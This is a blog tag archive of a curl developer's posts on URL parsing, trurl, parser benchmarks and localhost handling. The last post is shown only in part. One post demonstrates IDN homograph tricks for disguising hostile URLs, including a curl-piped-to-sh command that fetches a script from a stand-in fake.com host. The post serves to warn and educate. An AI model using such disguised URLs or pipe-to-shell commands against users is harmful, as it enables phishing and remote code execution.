Tag Archives: URL

URL parser performance

URLs are a dear subject of mine on this blog, as readers might have noticed.

“URL” is this mythical concept of a string that identifies a resource online, and yet there is no single established standard for its syntax. There are instead multiple standards, one of which is deliberately “moving” so it never actually makes up its mind but instead keeps changing.

As a result, basically no two URL parsers treat URLs the same, to the extent that mixing parsers is considered a security risk.

The standards

The browsers have established their WHATWG URL Specification as a “living document” that describes how browsers should parse URLs, gradually taking steps away from the earlier established RFC 3986 and RFC 3987 attempts.

The WHATWG standard keeps changing, and the world that tries to stick to RFC 3986 still sometimes needs to absorb and adapt to WHATWG influences in order to interoperate with the browser-centric part of the web. This leaves URL parsing and “URL syntax” everywhere in a sorry state.

curl

In the curl project we decided in 2018 to help mitigate the mixed URL parser problem by adding a URL parser API, so that applications that use libcurl can use the same parser for all their URL parsing needs and thus avoid the dangerous mixing part.

The libcurl API for this purpose is designed to let users parse URLs, extract individual components, set or change individual components and finally extract a normalized URL if wanted. It also includes some URL encoding/decoding and IDN support.
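
A minimal sketch of what that flow can look like with this API – just an illustration, not an example lifted from the curl documentation:

#include <stdio.h>
#include <curl/curl.h>

int main(void)
{
  CURLU *h = curl_url();            /* create a URL handle */
  char *url = NULL;

  /* parse a full URL, change one component, then ask for the result back */
  if(!curl_url_set(h, CURLUPART_URL, "https://Example.com/path?search=foo", 0) &&
     !curl_url_set(h, CURLUPART_HOST, "curl.se", 0) &&
     !curl_url_get(h, CURLUPART_URL, &url, 0)) {
    printf("%s\n", url);            /* the full, normalized URL */
    curl_free(url);
  }
  curl_url_cleanup(h);
  return 0;
}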

trurl

Thanks to the availability and functionality of the public libcurl URL API, we could build and ship the separate trurl tool earlier this year.

Ada

Some time ago I was made aware of an effort to (primarily) write a new URL parser for node js – although the parser is stand-alone and can be used by anyone else who wants to: The Ada URL Parser. The two primary developers behind this effort, Yagiz Nizipli and Daniel Lemire, figured out that node does a large amount of URL parsing, so speeding up this parser alone would apparently have a general performance impact.

Ada is a C++ project designed to parse WHATWG URLs, and the first time I was in contact with Yagiz he of course mentioned how much faster their parser is compared to curl’s.

You can also see them reproduce and talk about these numbers on this node js conference presentation.

Benchmarks

Everyone who ever tried to write code faster than some other code has found themselves in a position where they need to compare. To benchmark one code set against the other. Benchmarking is an art that is close to statistics and marketing: very hard to do without letting your own biases or presumptions affect the outcome.

Speed vs the rest

After I first spoke with Yagiz, I went back to the libcurl code to see what obvious mistakes I had made and what low-hanging fruit there was to pick in order to speed things up a little. I found a few flaws that maybe made a minor difference, but in my view there are several other properties of the API that are actually more important than sheer speed:

  • non-breaking API and ABI
  • readable and maintainable code
  • sensible and consistent API
  • error codes that help users understand what the problem is

Of course, there is also the thing that if you first figure out how to parse a URL the fastest way, maybe you can work out a smoother API that works better with that parsing approach. That is not how I went about it when creating the libcurl API.

If we can maintain those properties mentioned above, I still want the parser to run as fast as possible. There is no point in being slower than necessary.

URLs vs URLs

Ada parses WHATWG URLs and libcurl parses RFC 3986 URLs. They parse URLs differently and provide different feature sets. They are not interchangeable.

In Ada’s benchmarks they have ignored these parser differences. Throw the parsers against each other and, according to all their public data since early 2023, their parser is 7-8 times faster.

700% faster really?

So how on earth can you make such a simple thing as URL parsing 700% faster? It never sat right with me when they claimed those numbers but since I had not compared them myself I trusted them. After all, they should be fairly easy to compare and they seemed clueful enough.

Until recently, when I decided to reproduce their claims and see how much their numbers depend on their specific choices of URLs to parse. It taught me something.

Reproduce the numbers

In my tests, their parser is fast. It is clearly faster than the libcurl parser, and I too of course ignored the parser results since they would not be comparable anyway.

In my tests on my development machine, Ada is 1.25 – 1.8 times faster than libcurl. There is no doubt Ada is faster, just far away from the enormous difference they claim. How come?

  1. You use the input data that most favorably shows a difference
  2. You run the benchmark on hardware for which your parser has magic hardware acceleration

I run a decently modern 13th gen Intel Core i7-13700K CPU in my development machine. It is really fast, especially on single-threaded stuff like this. On my machine, the Ada parser can parse more URLs per second than even the Ada people themselves claim, which just tells us they used slower machines to test on. Nothing wrong with that.

The Ada parser has code that uses platform-specific instructions in some environments, and the benchmark they decided to use when boasting about their parser was done on such a platform. An Apple M1 CPU, to be specific: in most aspects except performance per watt, not a speed monster of a CPU.

In itself this is not wrong, but maybe a little misleading as this is far from clearly communicated.

I have a script, urlgen, that generates URLs in as many combinations as possible so that the parser’s every corner and angle are suitably exercised and verified. Many of those combinations are therefore illegal in subtle ways. This is the set of URLs I have mostly thrown at the curl parser, which then also might explain why this test data is the set that makes Ada least favorable (at 1.26 x the libcurl speed). Again: their parser is faster, no doubt. I have not found a test case that does not show it running faster than libcurl’s parser.

A small part of the explanation for why they are faster is of course that they do not return the result, the individual components, in their own separately allocated strings.

Here is a separate, detailed document on how I compared.

More mistakes

They also repeatedly insist curl does not handle Internationalized Domain Names (IDN) correctly, which I simply cannot understand and have not gotten any explanation for. curl has handled IDN since 2004. I am guessing it is a mistake, an old bug, or that they used a curl build without IDN support.

Size

I would think a primary argument against using Ada over libcurl’s parser is its code size. Not that I believe there are many situations where users are actually selecting between these two.

Ada header and source files are 22,774 lines of C++.

libcurl URL API header and source files are 2,103 lines of C.

Comparing the code sizes like this is a little unfair since Ada has its own IDN management code included, which libcurl does not, and that part comes with several huge tables and more.

Improving libcurl?

I am sure there is more that can be done to speed up the libcurl URL parser, but there is also the case of diminishing returns. I think it is pretty fast already. On Ada’s test case using 100K URLs from Wikipedia, libcurl parses them at an average of 178 nanoseconds per URL on my machine. More than 5.6 million real world URLs parsed per second per core.

This, while also storing each URL component in a separate allocation after each parse, and also returning an error code that helps identify the problem if the URL fails to parse. All with an established and well-documented API that has been working since 2018.
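
If you want a rough feel for numbers like these on your own machine, a naive timing loop over the URL API can look like the sketch below. This is not the harness used for the comparison document linked above, just an illustration, and the three URLs are stand-ins for a real test set:

#include <stdio.h>
#include <time.h>
#include <curl/curl.h>

int main(void)
{
  /* stand-in test data; a real run would load many thousands of URLs */
  static const char *urls[] = {
    "https://curl.se/docs/url-syntax.html",
    "http://example.com/?q=search#frag",
    "ftp://ftp.example.com/pub/file.txt",
  };
  const int n = sizeof(urls) / sizeof(urls[0]);
  const int rounds = 100000;
  struct timespec start, end;

  clock_gettime(CLOCK_MONOTONIC, &start);
  for(int r = 0; r < rounds; r++) {
    for(int i = 0; i < n; i++) {
      CURLU *h = curl_url();
      curl_url_set(h, CURLUPART_URL, urls[i], 0);
      curl_url_cleanup(h);
    }
  }
  clock_gettime(CLOCK_MONOTONIC, &end);

  double ns = (end.tv_sec - start.tv_sec) * 1e9 +
              (end.tv_nsec - start.tv_nsec);
  printf("%.0f ns per parse (including handle create/cleanup)\n",
         ns / (rounds * n));
  return 0;
}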

The hardware specific magic Ada uses can possibly be used by libcurl too. Maybe someone can try that out one day.

I think we have other areas in libcurl where work and effort are better spent right now.

trurl manipulates URLs

trurl is a tool in a similar spirit to tr but for URLs. Here, tr stands for translate or transpose.

trurl is a small command line tool that parses and manipulates URLs, designed to help shell script authors everywhere.

URLs are tricky to parse and there are numerous security problems in software because of this. trurl wants to help soften this problem by taking away the need for script and command line authors everywhere to re-invent the wheel over and over.

trurl uses libcurl’s URL parser and will thus parse and understand URLs exactly the same as curl the command line tool does – making it the perfect companion tool.

I created trurl on March 31, 2023.

Some command line examples

Given just a URL (even without scheme), it will parse it and output a normalized version:

$ trurl ex%61mple.com/
http://example.com/

The above command will guess an http:// scheme when none is provided. The guess uses basic heuristics: for example, host names that start with ftp often belong to FTP servers:

$ trurl ftp.ex%61mple.com/
ftp://ftp.example.com/

A user can output selected components of a provided URL, like if you only want to extract the path or the query component from it:

$ trurl https://curl.se/?search=foobar --get '{path}'
/

Or both (with extra text intermixed):

$ trurl https://curl.se/?search=foobar --get 'p: {path} q: {query}'
p: / q: search=foobar

A user can create a URL by providing the different components one by one and trurl outputs the URL:

$ trurl --set scheme=https --set host=fool.wrong
https://fool.wrong/

Reset a specific previously populated component by setting it to nothing. Like if you want to clear the user component:

$ trurl https://daniel@curl.se/ --set user=
https://curl.se/

trurl tells you the full new URL when the first URL is redirected to a second relative URL:

$ trurl https://curl.se/we/are/here.html --redirect "../next.html"
https://curl.se/we/next.html

trurl provides easy-to-use options for adding new segments to a URL’s path and query components. Not always easily done in shell scripts:

$ trurl https://curl.se/we/are --append path=index.html
https://curl.se/we/are/index.html
$ trurl https://curl.se?info=yes --append query=user=loggedin
https://curl.se/?info=yes&user=loggedin

trurl can work on a single URL or any number of URLs passed on to it. The modifications and extractions are then performed on them all, one by one.

$ trurl https://curl.se localhost example.com 
https://curl.se/
http://localhost/
http://example.com/

trurl can read URLs to work on from a file or from stdin, and works on them in a streaming fashion suitable for filters etc.

$ cat many-urls.yxy | trurl --url-file -
...

More or different

trurl was born just a few days ago; this is what we have made it do so far. There is a high probability that it will change further going forward before it settles on exactly how things ideally should work.

It also means that we are extra open to and welcoming of feedback, ideas and pull requests. With some luck, this could become a new everyday tool for all of us.

Tell us on GitHub!

IDN is crazy

IDN, Internationalized Domain Names, is the concept that lets us register and use international characters in domain names, and by international we of course mean characters outside of the ASCII range.

Recently I have fought some battles against IDN and IDN decoding so I felt this urge to write a lot of words about it to help me in my healing process and maybe mend my scars a little. I am not sure it worked but at least I feel a little better now.

(If WordPress had more sensible Unicode handling, this post would have nicer looking examples. I can enter Unicode fine, but if I save the post as a draft and come back to it later, most of the Unicode characters are replaced by question marks! Because of this, the examples below are not all using the exact Unicode symbols the text speaks of.)

Punycode

IDN works by having applications convert the Unicode name into the ASCII-based punycode version under the hood, and then use that with DNS etc. The punycode version of “räksmörgås.se” becomes “xn--rksmrgs-5wao1o.se”. A pretty clever solution really.
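
The conversion itself is available from libraries such as libidn2, one of the libraries curl can be built to use for IDN. A small sketch, assuming libidn2 and a UTF-8 encoded source file:

#include <stdio.h>
#include <stdlib.h>
#include <idn2.h>

int main(void)
{
  char *ascii = NULL;
  /* convert a UTF-8 host name to its ASCII (punycode) form */
  if(idn2_to_ascii_8z("räksmörgås.se", &ascii, IDN2_NONTRANSITIONAL) == IDN2_OK) {
    printf("%s\n", ascii);   /* expected: xn--rksmrgs-5wao1o.se */
    free(ascii);
  }
  return 0;
}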

The good side

Using this method, we can use URLs like https://räksmörgås.se or even ones written entirely in Arabic, Chinese or Cyrillic etc in compliant applications like browsers and curl. Even the TLD can be “international”. The whole Unicode range is at our disposal and this is certainly a powerful tool and allows a lot of non-Latin based languages to actually be used for domain names.

Gone are the days when everything needed to be converted to Latin.

There are many ugly sides

Already from the start of the IDN adventure, people realized that Unicode contains a lot of symbols that are identical or almost identical to other symbols, so you can make up perfect fake sites that provide no or very little visual distinction from the ones they try to look like.

Homographs

I remember early demonstrations using paypal.com vs paypal.com, where the second name was actually using a completely different letter somewhere. Perhaps for example the ‘l’ used the Cyrillic Capital Letter Iota (U+A646) – which in most fonts is next to indistinguishable from the lower case ASCII letter L. This is commonly referred to as an IDN Homograph attack. They look identical, but are different.

This concept of replacing one or more characters with identical glyphs is mitigated in part in browsers, which switch to showing the punycode version in the URL bar instead of the Unicode version – when they think it is mandated. Domain names are not allowed to mix scripts for different languages, and if they do, the IDN names are displayed using their punycode versions.

This of course does not prevent someone from promoting a curl command line that uses such a look-alike name, and maybe encouraging its use:

curl https://example.com/api/

If you would copy and paste such an example, you would find that curl cannot resolve xn--exampe-7r6v.com! Or if you use the same symbol in the curl domain name:

$ curl https://curl.se
curl: (6) Could not resolve host: xn--cur-ju2l.se

Heterograph?

Similar to the previous confusion, there’s another version of the homograph attack and this is one that stayed under the radar for me for a long time. I suppose we can call it a Heterograph attack, as it makes names look different when they are in fact the same.

The IDN system is also “helpfully” replacing some similarly looking glyphs with their ASCII counterparts. I use quotes around helpfully, because I truly believe that this generally causes more harm and pain in users’ lives than it actually does good.

A user can provide a name using an IDN version of one or more characters within the name, and that name then gets translated into a regular non-IDN name and is used normally from then on. I realize this may sound complicated, but it really is not.

Let me show you a somewhat crazy example (shown as an image to prevent WordPress from interfering). You want to use a curl command line to get the contents of the URL https://curl.se but since you are wild and crazy, you spice up things and replace every character in the domain name with a Unicode replacement:

If you would copy and paste this command line into your terminal, it works. Everyone can see that this domain name looks crazy, but it does not matter. It still works. It also works in browsers. A browser will however immediately show the translated version in the URL bar.

This method can be used for avoiding filters and has several times been used to find flaws in curl’s HSTS handling. Surely other tools can be tricked and fooled using variations of this as well.

This works because the characters used in the domain name are automatically converted to their ASCII counterparts by the IDN function. And since there are no IDN characters left after the conversion, it does not end up punycoded but instead is plain old ASCII again. Those Unicode symbols simply translate into “curl.se”.

The example above also replaces the period before “se” with the Halfwidth Ideographic Full Stop (U+FF61).

Replacing the dot this way works as well. “Helpful”.

A large set to pick from

If we look at the letter ‘c’ alone, it has a huge number of variations in the Unicode set that all translate into ASCII ‘c’ by the IDN conversion. I found at least these fifteen variations that all convert to c:

  • Fullwidth Latin Small Letter C (U+FF43)
  • Modifier Letter Small C (U+1D9C)
  • Small Roman Numeral One Hundred (U+217D)
  • Mathematical Bold Small C (U+1D41C)
  • Mathematical Italic Small C (U+1D450)
  • Mathematical Bold Italic Small C (U+1D484)
  • Mathematical Script Small C (U+1D4B8)
  • Mathematical Fraktur Small C (U+1D520)
  • Mathematical Double-Struck Small C (U+1D554)
  • Mathematical Bold Fraktur Small C (U+1D588)
  • Mathematical Sans-Serif Small C (U+1D5BC)
  • Mathematical Sans-Serif Bold Small C (U+1D5F0)
  • Mathematical Sans-Serif Italic Small C (U+1D624)
  • Mathematical Sans-Serif Bold Italic Small C (U+1D658)
  • Mathematical Monospace Small C (U+1D68C)

The Unicode consortium even has this collection of “confusables” which also features a tool that lets you visualize a name done with various combinations of Unicode homographs. I entered curl, and here’s a subset of the alternatives it showed me:

Supposedly, all of those combinations can be used as IDN names and they will work.

Homographic slash

The Fraction Slash (U+2044) looks very much like an ASCII slash, but is not. Use it instead of a slash to make the URL look like a host name followed by a slash, and then add your own domain name after it:

$ curl https://google.com/.curl.se
curl: (6) Could not resolve host: google.xn--com-qt0a.curl.se

If you paste that URL into a browser, it will switch to punycode mode, but still. The next example also shows as punycode when I try it in Firefox.

Homographic question mark

If you want an alternative to the slash-looking non-slash symbol, you can also trick a user with something that looks similar to a question mark. The Latin Capital Letter Glottal Stop (U+0241) for example is a symbol that looks confusingly similar to a question mark in many fonts:

$ curl https://google.com?.curl.se
curl: (6) Could not resolve host: google.xn--com-sqb.curl.se

In both the slash and these question mark examples, I could of course set up a host that would have some clever content.

Homographic fragment

The Viewdata Square (U+2317) can be used to mimic a hash symbol.

$ curl https://trusted.com#.fake.com
curl: (6) Could not resolve host: trusted.xn--com-d62a.fake.com

Percent encode the thing

It can look even weirder if you combine the above tricks and then percent-encode the UTF-8 bytes. This thing below still ends up “https://curl.se”:

$ curl "https://%e2%84%82%e1%b5%a4%e2%93%87%e2%84%92%e3%80%82%f0%9d%90%92%f0%9f%84%b4"

That URL of course also works fine to paste into a browser’s URL bar.

Zero Width space

Unicode offers this fun “symbol” that is literally nothing. It is a zero width space (U+200B). The IDN handling also recognizes this and will remove any such in the process. This means that you can add one or more zero width spaces to any domain in a URL and the domain will still work and end up being the original one. The UTF-8 sequence for this is %e2%80%8b when expressed percent encoded.

Instead of using curl.se you can thus use cu%e2%80%8brl.se. Or even cu%e2%80%8brl.s%e2%80%8be!

$ curl https://cu%e2%80%8brl.s%e2%80%8be

Tricking a curl user

curl users will not get the punycode version shown in a URL bar, so we might be easier to fool with these stunts. If the user does not carefully check, perhaps via the verbose output, they might very well be fooled.

HTTPS does not save us either, because nothing prevents an impostor from creating this domain name and having a perfectly valid certificate for it.

A really sneaky command line that tricks users into downloading something from a fake site, while appearing to download from a known and trusted one, can look like this:

$ curl https://trusted.com?.fake.com/file -O

… but since the question mark on the right side of ‘com’ is a Unicode symbol, and the curl tool supports IDN, it actually gets a page from “fake.com”. As the owner of fake.com, we would only need to make sure that https://trusted.xn--com-qt0a.fake.com exists and works.

A real world attack could even have a redirect to the real trusted.com domain for 99% of the cases or maybe for all cases where the user agent or source IP are not the ones we are looking for.

The old pipe from curl to shell thing is of course also an effective trick. It looks like you get the script from trusted.com using HTTPS and everything:

$ curl https://trusted.com?.fake.com/script | sh

More

This blog post is not meant to be a conclusive list of all problems or possible IDN trickery you can play with. I hear for example that mixing right-to-left with left-to-right in the same domain name is another treasure trove of confusions ready for your further explorations.

Game on!

Mitigations

People have mentioned this in comments to the post: not all registrars allow you to register domains containing specific Unicode symbols. In the past we have however seen that some TLDs are more liberal. Also, what I mention above are mostly tricks you can do without registering a new domain.

ICANN presumably has rules against use of emojis etc when creating new TLDs.

Discuss

Hacker news.

http://http://http://@http://http://?http://#http://

The other day I sent out this tweet:

"http://http://http://@http://http://?http://#http://"

is a legitimate URL

As it took off, got amazing attention and I received many different comments and replies, I felt a need to elaborate a little. To add some meat to this.

Is this string really a legitimate URL? What is a URL? How is it parsed?

http://http://http://@http://http://?http://#http://

curl

Let’s start with curl. It parses the string as a valid URL, and it does it like this. I have broken down the sections below to help illustrate:

http://http://http://@http://http://?http://#http://

Going from left to right.

http – the scheme of the URL. This speaks HTTP. The “://” separates the scheme from the following authority part (that’s basically everything up to the path).

http – the user name up to the first colon

//http:// – the password up to the at-sign (@)

http: – the host name, followed by a colon. The colon is a port number separator, but a missing number will be treated by curl as the default port number. Browsers also treat missing port numbers like this. The default port number for the http scheme is 80.

//http:// – the path. Multiple leading slashes are fine, and so is using a colon in the path. It ends at the question mark separator (?).

http:// – the query part. To the right of the question mark, but before the hash (#).

http:// – the fragment, also known as “anchor”. Everything to the right of the hash sign (#).
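
Incidentally, libcurl’s own URL API can show this split. A small sketch that simply prints whatever the parser reports, so the exact output depends on the curl version used:

#include <stdio.h>
#include <curl/curl.h>

static void show(CURLU *h, CURLUPart part, const char *name)
{
  char *p = NULL;
  if(!curl_url_get(h, part, &p, 0)) {
    printf("%-8s: %s\n", name, p);
    curl_free(p);
  }
}

int main(void)
{
  CURLU *h = curl_url();
  if(!curl_url_set(h, CURLUPART_URL,
                   "http://http://http://@http://http://?http://#http://", 0)) {
    show(h, CURLUPART_SCHEME,   "scheme");
    show(h, CURLUPART_USER,     "user");
    show(h, CURLUPART_PASSWORD, "password");
    show(h, CURLUPART_HOST,     "host");
    show(h, CURLUPART_PATH,     "path");
    show(h, CURLUPART_QUERY,    "query");
    show(h, CURLUPART_FRAGMENT, "fragment");
  }
  curl_url_cleanup(h);
  return 0;
}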

To use this URL with curl and serve it on your localhost try this command line:

curl "http://http://http://@http://http://?http://#http://" --resolve http:80:127.0.0.1

The curl parser

The curl parser has been around for decades already, and “do not break existing scripts and applications” is one of our core principles. Thus, some of the choices in the URL parser were made a long time ago and we stand by them, even if they might be slightly questionable standards-wise. As if any standard meant much here.

The curl parser started its life as lenient as it could possibly be. While it has been made stricter over the years, traces of the original design still show. In addition to that, we have also felt forced to make adaptations to the parser to make it work with real world URLs thrown at it. URLs that maybe once were not deemed fine, but that have become “fine” because they are accepted in other tools and perhaps primarily in browsers.

URL standards

I have mentioned it many times before. What we all colloquially refer to as a URL is not something that has a firm definition:

There is the URI (not URL!) definition from IETF RFC 3986, there is the WHATWG URL Specification that browsers (try to) adhere to, and there are numerous different implementations of parsers that are more or less strict in following one or both of the above-mentioned specifications.

You will find that when you scrutinize them down to the details, hardly any two URL parsers agree on every little character.

Therefore, if you throw the above-mentioned URL at any random URL parser, it may reject it (the Twitter parser, for example, did not seem to think it was a URL) or it might come to a different conclusion about the different parts than curl does. In fact, it is likely that it will not do exactly as curl does.

Python’s urllib

April King threw it at Python’s urllib. A valid URL! While it accepted it as a URL, it split it differently:

ParseResult(scheme='http',
            netloc='http:',
            path='//http://@http://http://',
            params='',
            query='http://',
            fragment='http://')

Given the replies to my tweet, several other parsers made a similar interpretation. Possibly because they use the same underlying parser…

JavaScript

Meduz showed how the JavaScript URL object treats it, and it looks quite similar to the Python result above. Still a valid URL.

Firefox and Chrome

I added the host entry ‘127.0.0.1 http‘ into /etc/hosts and pasted the URL into the address bar of Firefox. It rewrote it to

http://http//http://@http://http://?http://#http://

(the second colon from the left is removed, everything else is the same)

… but still considered it a valid URL and showed the contents from my web server.

Chrome behaved exactly the same. A valid URL according to it, and a rewrite of the URL like Firefox does.

RFC 3986

Some commenters mentioned that the unencoded slashes in the authority part make it not RFC 3986 compliant. Section 3.2 says:

The authority component is preceded by a double slash ("//") and is terminated by the next slash ("/"), question mark ("?"), or number sign ("#") character, or by the end of the URI.

Meaning that the password should have its slashes URL-encoded as %2f to make it valid. At least. So maybe not a valid URL?

Update: it actually still qualifies as “valid”, it just gets parsed a little differently than how curl does it. There is no question, though, that curl’s interpretation does not match RFC 3986.

HTTPS

The URL works equally fine with https.

https://https://https://@https://https://?https://#https://

The two reasons I did not use https in the tweet:

  1. It made it 7 characters longer for no obvious extra fun
  2. It is harder to prove it working by serving your own content, as you would need curl -k or similar to make the host name ‘https’ be accepted versus the name used in the actual server you would target.

The URL Buffalo buffalo

A surprisingly large number of people thought it reminded them of the old buffalo buffalo thing.

Don’t mix URL parsers

I have had my share of adventures with URL parsers and their differences in the past. The current state of my research on the topic of (failed) URL interoperability remains available in this GitHub document.

Use one and only one

There is still no common or standard URL syntax format in sight. A string that you think looks like a URL passed to one URL parser might be considered fine, but passed to a second parser it might be rejected or get interpreted differently. I believe the state of URLs in the wild has never before been this poor.

The problem

If you parse a URL with parser A and make conclusions about the URL based on that, and then pass the exact same URL to parser B and it draws different conclusions and properties from that, it opens up not only for strange behaviors but in some cases for downright security vulnerabilities.

This is easily done when you for example use two different libraries, frameworks or tools that need to work on that URL, but the repercussions are not always easy to see at once.

A well-known presentation on this topic from 2017 is Orange Tsai’s A New Era Of SSRF – Exploiting Url Parsers.

URL Parsing Confusion

The report EXPLOITING URL PARSERS: THE GOOD, BAD, AND INCONSISTENT (by Noam Moshe, Sharon Brizinov, Raul Onitza-Klugman and Kirill Efimov) was published today and I have had the privilege to have read and worked with the authors a little on this prior to its release.

As you see in the report, it shows that problems very similar to those Mr Tsai reported and exploited back in 2017 are still present today, although perhaps in slightly different ways.

As the report shows, the problem is not only that there are different URL standards and that every implementation provides a parser that is somewhere in between both specs, but on top of that, several implementations often do not even follow the existing conflicting specifications!

The report authors also found and reported a bug in curl’s URL parser (involving percent encoded octets in host names) which I’ve subsequently fixed so if you use the latest curl that one isn’t present anymore.

curl’s URL API

In the curl project we attempt to help applications and authors to reduce the number of needed URL parsers in any given situation – to a large part as a reaction to the Tsai presentation from 2017 – with the URL API we introduced for libcurl in 2018.

Thanks to this URL parser API, if you are already using libcurl for transfers, it is easy to also parse and treat URLs elsewhere exactly the same way libcurl does. By sticking to the same parser, there is a significantly smaller risk that repeated parsing brings surprises.

Other work-arounds

If your application uses different languages or frameworks, another work-around to lower the risk that URL parsing differences will hurt you, is to use a single parser to extract the URL components you need in one place and then work on the individual components from that point on. Instead of passing around the full URL to get parsed multiple times, you can pass around the already separated URL parts.
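
As a sketch of that pattern, here is one way to parse once with libcurl’s parser and only hand the pre-split pieces to the rest of the program. The url_parts struct is made up for this illustration and error cleanup is simplified:

#include <stdio.h>
#include <curl/curl.h>

struct url_parts {      /* made-up container for this illustration */
  char *scheme;
  char *host;
  char *path;
};

/* the one and only place in the program that parses a URL string */
static int split_url_once(const char *url, struct url_parts *out)
{
  CURLU *h = curl_url();
  int ok = 0;
  out->scheme = out->host = out->path = NULL;
  if(!curl_url_set(h, CURLUPART_URL, url, 0) &&
     !curl_url_get(h, CURLUPART_SCHEME, &out->scheme, 0) &&
     !curl_url_get(h, CURLUPART_HOST, &out->host, 0) &&
     !curl_url_get(h, CURLUPART_PATH, &out->path, 0))
    ok = 1;
  curl_url_cleanup(h);
  return ok;
}

int main(void)
{
  struct url_parts u;
  if(split_url_once("https://curl.se/docs/url-syntax.html", &u)) {
    /* everything downstream only ever sees the already-split parts */
    printf("scheme=%s host=%s path=%s\n", u.scheme, u.host, u.path);
    curl_free(u.scheme);
    curl_free(u.host);
    curl_free(u.path);
  }
  return 0;
}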

Future

I am not aware of any present ongoing work on consolidating the URL specifications. I am not even aware of anyone particularly interested in working on it. It is a contentious area, and I will get my share of blow-back again now by writing up my own view of the state.

The WHATWG would probably say they would like to be the steward of this, and they are generally keen on working with URLs from a browser standpoint. That limits them to a small number of protocol schemes, and from my experience, getting them interested in changing something for the sake of aligning with RFC 3986 parsers is hard. This is however the team that, more than any other, has moved furthest away from the standard we once had established. There are also strong anti-IETF sentiments oozing there. The WHATWG spec is a “living specification”, which means it continues to change and drift away over time.

The IETF published RFC 3986 back in 2005, saw RFC 3987 pretty much fail, and then more or less gave up on URLs. I know there are people and working groups there who would like to see URLs brought back to the agenda (I have talked to a few of them over the years), and many IETFers think that the IETF is the only group that can do it properly, but due to the unavoidable politics and the almost certain collision course against (and cooperation problems with) WHATWG, it is considered a very hot potato that barely anyone wants to hold. There are also strong anti-WHATWG feelings in some areas of the IETF. There is just too small a chance of a successful outcome from something that most likely will take a lot of effort, will, thick skin and backing from several very big companies.

We are stuck here. I foresee yet another report to be written a few years down the line that shows more and new URL problems.

My URL isn’t your URL.

curl localhost as a local host

When you use the name localhost in a URL, what does it mean? Where does the network traffic go when you ask curl to download http://localhost ?

Is “localhost” just a name like any other, or do you assume it implies speaking to your local host on a loopback address?

Previously

curl http://localhost

The name was “resolved” using the standard resolver mechanism into one or more IP addresses, and then curl connected to the first one that worked and got the data from there.

The (default) resolving phase there involves asking the getaddrinfo() function about the name. In many systems, it will return the IP address(es) specified in /etc/hosts for the name. In some systems, things are set up a bit more unusually, which causes a DNS query to be sent out over the network to answer the question.

In other words: localhost was not really special and using this name in a URL worked just like any other name in curl. In most cases in most systems it would resolve to 127.0.0.1 and ::1 just fine, but in some cases it would mean something completely different. Often as a complete surprise to the user…

Starting now

curl http://localhost

Starting in commit 1a0ebf6632f8, to be released in curl 7.78.0, curl now treats the host name “localhost” specially and will use an internal “hard-coded” set of addresses for it – the ones we typically use for the loopback device: 127.0.0.1 and ::1. It cannot be modified by /etc/hosts and it cannot be accidentally or deliberately tricked by DNS resolves. localhost will now always resolve to a local address!

Do those kinds of mistakes or modifications really happen? Yes, they do. We have seen it, and you can find other projects reporting it as well.

Who knows, it might even be a few microseconds faster than doing the “full” resolve call.

(You can still build curl without IPv6 support at will, and on systems without such support the ::1 address of course will not be provided for localhost.)

Specs say we can

RFC 6761 is titled Special-Use Domain Names and in its section 6.3 it specifically allows or even encourages this:

Users are free to use localhost names as they would any other domain names.  Users may assume that IPv4 and IPv6 address queries for localhost names will always resolve to the respective IP loopback address.

Followed by

Name resolution APIs and libraries SHOULD recognize localhost names as special and SHOULD always return the IP loopback address for address queries and negative responses for all other query types. Name resolution APIs SHOULD NOT send queries for localhost names to their configured caching DNS server(s).

Mike West at Google also once filed an I-D with even stronger wording, suggesting we should always let localhost be local. That was never turned into an RFC, but it shows a mindset.

(Some) Browsers do it

Chrome has been special-casing localhost this way since 2017, as can be seen in this commit and I think we can safely assume that the other browsers built on their foundation also do this.

Firefox landed their corresponding change during the fall of 2020, as recorded in this bugzilla entry.

Safari (on macOS at least) does however not do this. It rather follows what /etc/hosts says (and presumably DNS if the name is not present in there). I have not found any official position on the matter, but I found this source code comment indicating that localhost resolving might change at some point:

// FIXME: Ensure that localhost resolves to the loopback address.

Windows (kind of) does it

Since some time back, Windows already resolves “localhost” internally and it is not present in their /etc/hosts alternative. I believe it is more of a hybrid solution though, as you can apparently put localhost into that file and then have that custom address get used for the name.

Secure over http://localhost

When we know for sure that http://localhost is indeed a secure context (that’s a browser term I’m borrowing, sorry), we can follow the example of the browsers: curl should for example be able to start honoring cookies with the “secure” property for this host even when the transfer is done over plain HTTP. Previously, secure in that regard has always just meant HTTPS.

This change in cookie handling has not happened in curl yet, but with localhost being truly local, it seems like an improvement we can proceed with.

Can you still trick curl?

When I mentioned this change proposal on twitter, two of the most common questions in response were:

  1. can’t you still trick curl by routing 127.0.0.1 somewhere else
  2. can you still use --resolve to “move” localhost?

The answers to both questions are yes.

You can of course commit the most hideous hacks to your system and reroute traffic to 127.0.0.1 somewhere else if you really wanted to. But I’ve never seen or heard of anyone doing it, and it certainly will not be done by mistake. But then you can also just rebuild your curl/libcurl and insert another address than the default as “hardcoded” and it’ll behave even weirder. It’s all just software, we can make it do anything.

The --resolve option is this magic thing to redirect curl operations from the given host to another custom address. It also works for localhost, since curl will check the cache before the internal resolve and --resolve populates the DNS cache with the given entries. (Provided to applications via the CURLOPT_RESOLVE option.)
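
For completeness, the corresponding libcurl application code might look roughly like the sketch below; the 192.0.2.1 address is just a placeholder from the documentation range:

#include <curl/curl.h>

int main(void)
{
  CURL *curl = curl_easy_init();
  if(curl) {
    /* pre-populate the DNS cache: send "localhost" port 80 to 192.0.2.1 */
    struct curl_slist *resolve =
      curl_slist_append(NULL, "localhost:80:192.0.2.1");

    curl_easy_setopt(curl, CURLOPT_RESOLVE, resolve);
    curl_easy_setopt(curl, CURLOPT_URL, "http://localhost/");
    curl_easy_perform(curl);

    curl_slist_free_all(resolve);
    curl_easy_cleanup(curl);
  }
  return 0;
}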

What will break?

With enough number of users, every single little modification or even improvement is likely to trigger something unexpected and undesired on at least one system somewhere. I don’t think this change is an exception. I fully expect this to cause someone to shake their fist in the sky.

However, I believe there are fairly good ways to restore even the most complicated use cases after this change, even if it might take some hands-on work to update the script or application. I still believe this change is a general improvement for the vast majority of use cases and users. That is also why I have not provided any knob or option to toggle off this behavior.

Credits

The top photo was taken by me (the symbolism being that there’s a path to take somewhere but we don’t really know where it leads or which one is the right to take…). This curl change was written by me. Mike West provided me the Chrome localhost change URL. Valentin Gosu gave me the Firefox bugzilla link.

curl those funny IPv4 addresses

Everyone knows that on most systems you can specify IPv4 addresses as just 4 decimal numbers separated with periods (dots). Example:

192.168.0.1

